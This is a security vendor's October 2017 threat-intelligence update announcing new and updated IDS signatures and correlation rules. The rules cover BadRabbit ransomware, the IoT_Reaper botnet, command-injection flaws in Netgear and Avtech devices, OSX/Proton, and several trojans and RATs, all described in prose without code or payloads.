Threat Intelligence and Cyber Threat Management (CTM) Protection Update for the 4th week of October 2017

New Detection Technique - Netgear DGN Remote Command Execution

An arbitrary remote code execution vulnerability exists in the Netgear N150 Wireless Modem Router DGN Series due to a bug in how "TimeToLive" parameter handles input validation. A specially-crafted packet can result in an attacker having remote command execution.

We've added IDS signatures and the following correlation rule to detect this activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Netgear DGN Remote Command Execution

New Detection Technique - BadRabbit

BadRabbit is a new ransomware family that is currently being distributed as a fake Flash update. BadRabbit utilizes Mimikatz, the Eternal Romance exploit, and a list of common passwords, similar to that of WannaCry or NotPetya, to spread in a wormlike fashion. 

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromise, Ransomware infection, BadRabbit

We also added IDS signatures and updated correlation rules to better detect the following ransomware families:

  • System Compromise, Ransomware infection, Cerber
  • System Compromise, Ransomware infection, Locky

New Detection Technique - IoT_Reaper

IoT_Reaper is a new and rapidly expanding botnet. While IoT_Reaper borrows some code from the infamous Mirai botnet, it has several key differences such as not cracking weak passwords. Instead, IoT_Reaper only exploits IoT devices. 

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromise, Trojan infection, IoT Reaper

New Detection Technique - BackSwing

BackSwing is a malicious javascript-based profiling framework. Malicious actors use this framework to target systems with specific versions of their malware.

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromise, Trojan infection, BackSwing

New Detection Techniques

We've added the following correlation rules as a result of additional recent malicious activity:

  • System Compromise, Trojan infection, CryptoService Coin Stealer
  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Possible D-Link 850L Password Extract Attempt
  • System Compromise, Trojan infection, Qtloader
  • System Compromise, Trojan infection, Dragonfly Backdoor.Goodor Go Implant

Updated Detection Technique - Malware SSL Certificates

We've added new IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:

  • System Compromise, C&C Communication, Known malicious SSL certificate
  • System Compromise, C&C Communication, Panda Banker SSL activity
  • System Compromise, C&C Communication, TrickBot SSL activity

Updated Detection Technique - OSX/Proton

OSX/Proton, the newest variant of the Proton family, has most recently been distributed via embedding in a popular piece of software called HandBrake. Upon execution, it displays a fake authentication popup in an attempt to elevate its privileges. Proton is currently being sold on the dark web for 40 BTC. 

We've added IDS signatures and updated the following correlation rule to detect this activity:

  • System Compromise, Trojan infection, OSX/Proton

Updated Detection Technique - Avtech

Multiple vulnerabilities have been found in the video surveillance products of Avtech, one of the world's leading manufacturers of a full range of surveillance products. Due to the apparent use of a common codebase, and lack of various security mitigations throughout their products, the discovered vulnerabilities will work on numerous other devices in the Avtech family. Such actions can be seen in the new ARM Linux malware ELF_IMEIJ.A, which exploits a CGI Directory vulnerability in CloudSetup.cgi to trigger the malware download. 

We've added IDS signatures and updated the following correlation rule to detect this activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Avtech - Authenticated command injection vulnerability

Updated Detection Technique - NETGEAR ReadyNAS Surveillance Command Injection Attempt

A unauthenticated command injection vulnerability exists due to the lack of input sanitation of the ''uploaddir" parameter. Specially-crafted packets can lead to an attacker being able to gain code execution. 

We've added IDS signatures and the following correlation rule to detect this activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, NETGEAR ReadyNAS Surveillance Command Injection Attempt

Updated Detection Technique - Remote Access Tools

The typical attack pattern involves first an attack (exploited vulnerability) and then installation of malware. Often this last step includes a Remote Administration Toolkit (RAT) used to gain control to the compromised machine.

We added IDS signatures and correlation rules to detect the following RAT activity:

  • System Compromise, Malware RAT, NanoCore

Updated Correlation Rules

We've updated the following correlation rules as a result of recent malicious activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Malicious Document
  • System Compromise, Malware infection, CoinMiner
  • System Compromise, Trojan infection, Chthonic
  • System Compromise, Trojan infection, Formbook
  • System Compromise, Trojan infection, Kryptik
  • System Compromise, Trojan infection, Panda Banker
  • System Compromise, Trojan infection, Qtloader
  • System Compromise, Trojan infection, Sality
  • System Compromise, Trojan infection, Trickbot
  • System Compromise, Trojan infection, Unknown trojan
  • System Compromise, Worm infection, Kraken